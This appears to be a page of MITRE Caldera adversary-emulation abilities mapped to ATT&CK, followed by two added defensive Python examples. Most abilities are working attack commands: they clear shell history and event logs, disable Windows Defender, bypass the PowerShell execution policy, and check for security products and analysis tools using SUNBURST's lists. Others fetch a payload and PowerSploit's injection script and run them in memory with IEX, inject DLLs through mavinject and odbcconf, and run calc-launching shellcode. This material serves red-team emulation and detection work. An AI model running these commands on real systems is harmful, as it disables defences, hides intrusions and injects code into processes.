
Caldera emulation abilities

15 runnable adversary-emulation actions · command + platform · mapped to ATT&CK

Abilities

defense-evasion ["darwin", "linux", "windows"] T1497.003 · Virtualization/Sandbox Evasion: Time Based Evasion
1-min sleep
Pause all operations for 60 seconds to avoid making noise (time-based sandbox evasion: automated analysis often times out before a delayed payload runs)
Command:
[{"platform": "darwin", "executor": "sh", "command": "sleep 60"}, {"platform": "linux", "executor": "sh", "command": "sleep 60"}, {"platform": "windows", "executor": "psh", "command": "sleep 60"}]
defense-evasion ["darwin", "linux", "windows"] T1070.003 · Indicator Removal on Host: Clear Command History
Avoid logs
Truncate the shell history file and stop the current shell from writing one (macOS/Linux: empty ~/.bash_history and unset HISTFILE; Windows: clear the PowerShell session history). Note that PSReadLine keeps its own history file (ConsoleHost_history.txt), which Clear-History does not touch, and that other shells such as zsh use a different history file.
Command:
[{"platform": "darwin", "executor": "sh", "command": "> $HOME/.bash_history && unset HISTFILE\n"}, {"platform": "linux", "executor": "sh", "command": "> $HOME/.bash_history && unset HISTFILE\n"}, {"platform": "windows", "executor": "psh", "command": "Clear-History;Clear"}]
Bypass ExecutionPolicy
Set the machine-wide ExecutionPolicy policy value to Bypass, then run Set-ExecutionPolicy Bypass and answer its confirmation prompt with WScript.Shell SendKeys. Needs administrative rights, and Set-ItemProperty fails if the HKLM\Software\Policies\Microsoft\Windows\PowerShell key does not already exist.
Command:
[{"platform": "windows", "executor": "psh", "command": "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n        $shell = New-Object -ComObject Wscript.Shell\n        Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")"}]
Check Security Services
Check for security (AV/EDR) services. The service list is the one the SUNBURST malware checked before activating during the SolarWinds compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).
Command:
[{"platform": "windows", "executor": "psh,pwsh", "command": "$securityServices = @(\n    \"msmpeng\",\n    \"windefend\",\n    \"mssense\",\n    \"sense\",\n    \"microsoft.tri.sensor\",\n    \"microsoft.tri.sensor.updater\",\n    \"cavp\",\n    \"cb\",\n    \"carbonblack\",\n    \"carbonblackk\",\n    \"cbcomms\",\n    \"cbstream\",\n    \"csfalconservice\",\n    \"csfalconcontainer\",\n    \"csagent\",\n    \"csdevicecontrol\",\n    \"csfalconservice\",\n    \"xagt\",\n    \"xagtnotif\",\n    \"fe_avk\",\n    \"fekern\",\n    \"feelam\",\n    \"fewscservice\",\n    \"ekrn\",\n    \"eguiproxy\",\n    \"egui\",\n    \"eamonm\",\n    \"eelam\",\n    \"ehdrv\",\n    \"ekrnepfw\",\n    \"epfwwfp\",\n    \"ekbdflt\",\n    \"epfw\",\n    \"fsgk32st\",\n    \"fswebuid\",\n    \"fsgk32\",\n    \"fsma32\",\n    \"fssm32\",\n    \"fnrb32\",\n    \"fsaua\",\n    \"fsorsp\",\n    \"fsav32\",\n    \"f-secure gatekeeper handler starter\",\n    \"f-secure network request broker\",\n    \"f-secure webui daemon\",\n    \"fsma\",\n    \"fsorspclient\",\n    \"f-secure gatekeeper\",\n    \"f-secure hips\",\n    \"fsbts\",\n    \"fsni\",\n    \"fsvista\",\n    \"f-secure filter\",\n    \"f-secure recognizer\",\n    \"fses\",\n"}]
Check analysis environment processes
Check for analysis/sandbox environment processes. The process blocklist is the one the SUNBURST malware checked before activating during the SolarWinds compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).
Command:
[{"platform": "windows", "executor": "psh", "command": "$forensicProcesses = @(\n    \"apimonitor-x64\",\n    \"apimonitor-x86\",\n    \"autopsy64\",\n    \"autopsy\",\n    \"autoruns64\",\n    \"autoruns\",\n    \"autorunsc64\",\n    \"autorunsc\",\n    \"binaryninja\",\n    \"blacklight\",\n    \"cff explorer\",\n    \"cutter\",\n    \"de4dot\",\n    \"debugview\",\n    \"diskmon\",\n    \"dnsd\",\n    \"dnspy\",\n    \"dotpeek32\",\n    \"dotpeek64\",\n    \"dumpcap\",\n    \"evidence center\",\n    \"exeinfope\",\n    \"fakedns\",\n    \"fakenet\",\n    \"ffdec\",\n    \"fiddler\",\n    \"fileinsight\",\n    \"floss\",\n    \"gdb\",\n    \"hiew32demo\",\n    \"hiew32\",\n    \"hollows_hunter\",\n    \"idaq64\",\n    \"idaq\",\n    \"idr\",\n    \"ildasm\",\n    \"ilspy\",\n    \"jd-gui\",\n    \"lordpe\",\n    \"officemalscanner\",\n    \"ollydbg\",\n    \"pdfstreamdumper\",\n    \"pe-bear\",\n    \"pebrowse64\",\n    \"peid\",\n    \"pe-sieve32\",\n    \"pe-sieve64\",\n    \"pestudio\",\n    \"peview\",\n    \"ppee\",\n    \"procdump64\",\n    \"procdump\",\n    \"processhacker\",\n    \"procexp64\",\n    \"procexp\",\n    \"procmon\",\n    \"prodiscoverbasic\",\n    \"py2exedecompiler\",\n    \"r2agent\",\n  "}]
Clear Logs
Clear the Security and System event logs [intended to trigger CAR-2016-04-002]. Requires administrative rights; the clearing itself is recorded as Security event 1102 and System event 104, which is what the analytic keys on.
Command:
[{"platform": "windows", "executor": "psh,pwsh", "command": "Clear-Eventlog Security;\nClear-Eventlog System;\n"}]
defense-evasion ["windows", "darwin", "linux"] T1070.004 · Indicator Removal on Host: File Deletion
Deadman - Delete agent file
Deadman ability: delete the agent's own executable after it terminates. Windows spawns a hidden cmd.exe through WMI (Win32_Process Create) that waits 10 s and then deletes #{location}; macOS/Linux removes #{exe_name} from the current directory once lsof shows at most one process (the exiting agent) holding it open.
Command:
[{"platform": "windows", "executor": "psh", "command": "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n    Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n    ProcessStartupInformation = [CimInstance]$startupInfo\n};\n"}, {"platform": "darwin", "executor": "sh", "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n"}, {"platform": "linux", "executor": "sh", "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;"}]
defense-evasion ["darwin", "linux", "windows"] T1070.004 · Indicator Removal on Host: File Deletion
Delete payload
Remove a downloaded payload file
Command:
[{"platform": "darwin", "executor": "sh", "command": ""}, {"platform": "linux", "executor": "sh", "command": ""}, {"platform": "windows", "executor": "psh,pwsh", "command": ""}]
Disable Windows Defender All
Disable Windows Defender's intrusion prevention, IOAV (download/attachment) scanning, real-time monitoring, script scanning and Controlled Folder Access via Set-MpPreference. Requires administrative rights; with Tamper Protection enabled the changes are ignored.
Command:
[{"platform": "windows", "executor": "psh", "command": "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n"}]
Disable Windows Defender Real-Time Protection
Disable real-time monitoring via Set-MpPreference; if the cmdlet is unavailable, fall back to stopping the WinDefend service. The fallback rarely works on current Windows, where the service is protected and Stop-Service is denied.
Command:
[{"platform": "windows", "executor": "psh", "command": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n  Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n  $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n  if ($service) {\n    if ($service.Status -eq \"Running\") {\n      Stop-Service WinDefend;\n    }\n  } else {\n    echo \"Windows Defender service not found.\";\n    exit 1;\n  };\n};\n"}]
Inject Sandcat into process
Download the Sandcat DLL (built from shared.go) and PowerSploit's Invoke-ReflectivePEInjection from the Caldera server, load the script in memory with IEX and reflectively inject the DLL into process #{host.process.id}. The PowerSploit parameter is -PEBytes (the page had -PBytes, which the function does not accept).
Command:
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PEBytes $PEBytes -ProcId #{host.process.id}\n"}]
defense-evasion ["windows"] T1059.001 · PowerShell
Move Powershell & triage
Copy powershell.exe to C:\Windows\Temp\debug.exe and run triage commands (processes, local groups and users, CurrentVersion registry values) through the copy, appending output to C:\Windows\Temp\debug.log. The renamed copy is also what a Rename System Utilities (T1036.003) detection keys on: its OriginalFileName version-info field still reads PowerShell.EXE.
Command:
[{"platform": "windows", "executor": "psh", "command": "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n"}]
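Detection logic for three of the abilities above (Clear Logs, the two Disable Windows Defender abilities, and Move Powershell & triage), as an added example that is not part of this page or of Caldera. The event records are constructed dicts using the field names of Windows Security events and Sysmon; the Windows Defender registry prefix and the Disable* value-name convention are assumptions about what Set-MpPreference writes, and a real pipeline would feed parsed EVTX or Sysmon JSON instead of SAMPLE_EVENTS.

```python
"""Detection checks for three abilities listed above:
 - Clear Logs: Security 1102 / System 104 (CAR-2016-04-002, T1070.001)
 - Disable Windows Defender: Sysmon 13 registry writes under the Defender key (T1562.001)
 - Move Powershell & triage: Sysmon 1 where OriginalFileName is PowerShell.EXE
   but the image has another name (T1036.003)

Added example, not Caldera code. SAMPLE_EVENTS are constructed records.
"""
import ntpath

SYSMON = "Microsoft-Windows-Sysmon/Operational"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Assumed location of the Set-MpPreference settings; value names such as
# DisableRealtimeMonitoring mirror the cmdlet switches used in the abilities.
DEFENDER_KEY = r"HKLM\SOFTWARE\Microsoft\Windows Defender"

SAMPLE_EVENTS = [  # constructed, roughly in the order the abilities would produce them
    {"Channel": "Security", "EventID": 1102, "SubjectUserName": "labadmin"},
    {"Channel": "System", "EventID": 104, "Provider": "Microsoft-Windows-Eventlog"},
    {"Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\Temp\debug.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"C:\Windows\Temp\debug.exe get-process"},
    {"Channel": SYSMON, "EventID": 1, "Image": PS_PATH,
     "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell.exe"},
    {"Channel": SYSMON, "EventID": 13, "Image": PS_PATH,
     "TargetObject": DEFENDER_KEY + r"\Real-Time Protection\DisableRealtimeMonitoring",
     "Details": "DWORD (0x00000001)"},
    {"Channel": "Security", "EventID": 4624, "SubjectUserName": "labadmin"},
]


def is_log_clear(ev):
    """CAR-2016-04-002: clearing a log is itself logged (1102 Security, 104 System)."""
    if ev.get("Channel") == "Security" and ev.get("EventID") == 1102:
        return True
    return ev.get("Channel") == "System" and ev.get("EventID") == 104


def is_renamed_powershell(ev):
    """T1036.003: PE version info says PowerShell.EXE but the file is named differently."""
    if ev.get("Channel") != SYSMON or ev.get("EventID") != 1:
        return False
    if ev.get("OriginalFileName", "").lower() != "powershell.exe":
        return False
    # ntpath handles backslash paths regardless of the analyst's host OS
    return ntpath.basename(ev.get("Image", "")).lower() != "powershell.exe"


def is_defender_tamper(ev):
    """T1562.001: a Disable* value under the Defender key set to 1."""
    if ev.get("Channel") != SYSMON or ev.get("EventID") != 13:
        return False
    key, value_name = ntpath.split(ev.get("TargetObject", ""))
    if not key.lower().startswith(DEFENDER_KEY.lower()):
        return False
    return value_name.lower().startswith("disable") and "0x00000001" in ev.get("Details", "")


RULES = {
    "log_clear": is_log_clear,
    "renamed_powershell": is_renamed_powershell,
    "defender_tamper": is_defender_tamper,
}


def detect(events):
    """Return (event index, rule name) for every event that trips a rule."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for i, name in detect(SAMPLE_EVENTS):
        print(f"event {i}: {name} -> {SAMPLE_EVENTS[i]}")
```

The legitimate powershell.exe launch (event 3) and the logon (event 5) do not fire; the renamed-binary rule relies on Sysmon's OriginalFileName field, so a copy with stripped version info would need a hash-based rule instead.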
Signed Binary Execution - Mavinject
Leverage Mavinject (signed binary) for DLL injection: mavinject.exe <PID> /INJECTRUNNING <DLL> injects the DLL into a running explorer.exe. The /INJECTRUNNING switch is required, and the first explorer process is selected because Get-Process returns one per interactive session.
Command:
[{"platform": "windows", "executor": "psh", "command": "$explorer = Get-Process -Name explorer | Select-Object -First 1;\nmavinject.exe $explorer.Id /INJECTRUNNING C:\\Users\\Public\\sandcat.dll\n"}]
Signed Binary Execution - odbcconf
Leverage odbcconf (signed binary) for DLL loading: the REGSVR action loads the DLL and calls its DllRegisterServer export, so the DLL's code runs inside odbcconf.exe.
Command:
[{"platform": "windows", "executor": "psh", "command": "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n"}]
defense-evasion ["windows"] T1055 · Process Injection
Spawn calculator (shellcode)
Start a new calculator process. The shellcode_amd64 executor runs these bytes as position-independent x64 code inside the agent process: the code pushes the string "calc" onto the stack, walks the PEB loader module list to kernel32.dll, scans its export name table for the entry beginning "WinE" (WinExec) and calls it with that string as the command line.
Command:
[{"platform": "windows", "executor": "shellcode_amd64", "command": "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3"}]
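Static triage of the Spawn calculator listing above before letting an agent execute it, as an added example that is not part of this page or of Caldera. The listing is copied verbatim from the ability; the two helpers recover the ASCII immediates of `push imm32` (opcode 0x68) and `cmp r/m32, imm32` (0x81 with ModRM reg field 7), which for this blob are "calc" and the "WinE" export-name tag. This is an opcode-aware heuristic rather than a disassembler: a 0x68 or 0x81 that happens to occur inside another instruction would be reported too.

```python
"""Convert a shellcode_amd64 listing to bytes and pull out its string immediates.

Added example, not Caldera code. Opcode-aware scanning avoids the false hits
that running strings(1) over code bytes produces (here 0x68 'h' sits right
before "calc", so a plain printable-run scan would report "hcalcTYH").
"""
import re

# Copied verbatim from the Spawn calculator ability above (105 bytes).
SHELLCODE_LISTING = (
    "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, "
    "0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, "
    "0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, "
    "0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, "
    "0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, "
    "0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, "
    "0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, "
    "0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, "
    "0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, "
    "0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, "
    "0x5B, 0x5A, 0x59, 0x58, 0xC3"
)


def parse_listing(listing):
    """Turn '0x50, 0x51, ...' into bytes (write them to a file for a real disassembler)."""
    return bytes(int(tok, 16) for tok in re.findall(r"0x[0-9A-Fa-f]{2}", listing))


def _ascii4(chunk):
    return len(chunk) == 4 and all(0x20 <= b < 0x7F for b in chunk)


def _modrm_operand_len(code, at):
    """Bytes used by a ModRM operand at code[at]: ModRM, optional SIB, displacement."""
    modrm = code[at]
    mod, rm = modrm >> 6, modrm & 7
    n = 1
    if mod != 3 and rm == 4:                 # SIB byte present
        n += 1
        if mod == 0 and (code[at + 1] & 7) == 5:
            n += 4                           # no base register: disp32 follows the SIB
    if mod == 0 and rm == 5:
        n += 4                               # RIP-relative disp32
    elif mod == 1:
        n += 1
    elif mod == 2:
        n += 4
    return n


def push_immediates(code):
    """ASCII dwords pushed with `push imm32` (0x68): how short strings such as "calc" are built on the stack."""
    return [code[i + 1:i + 5] for i in range(len(code) - 4)
            if code[i] == 0x68 and _ascii4(code[i + 1:i + 5])]


def cmp_immediates(code):
    """ASCII dwords compared with `cmp r/m32, imm32` (0x81 /7): the 4-byte tag used to pick an export by name."""
    found = []
    for i in range(len(code) - 5):
        if code[i] != 0x81 or (code[i + 1] >> 3) & 7 != 7:
            continue
        n = _modrm_operand_len(code, i + 1)
        imm = code[i + 1 + n:i + 5 + n]
        if _ascii4(imm):
            found.append(imm)
    return found


def triage(listing):
    """Summary an operator can eyeball before approving the ability."""
    code = parse_listing(listing)
    return {"size": len(code),
            "push_imm": [s.decode() for s in push_immediates(code)],
            "cmp_imm": [s.decode() for s in cmp_immediates(code)]}


if __name__ == "__main__":
    print(triage(SHELLCODE_LISTING))
```

For this listing the cmp at offset 68 has ModRM 0x3C (mod 0, reg 7, rm 4) followed by SIB 0x07, i.e. cmp dword [rdi+rax], 'WinE': the export-name loop matches only the first four characters, so any export starting with "WinE" would be taken, which in kernel32 is WinExec.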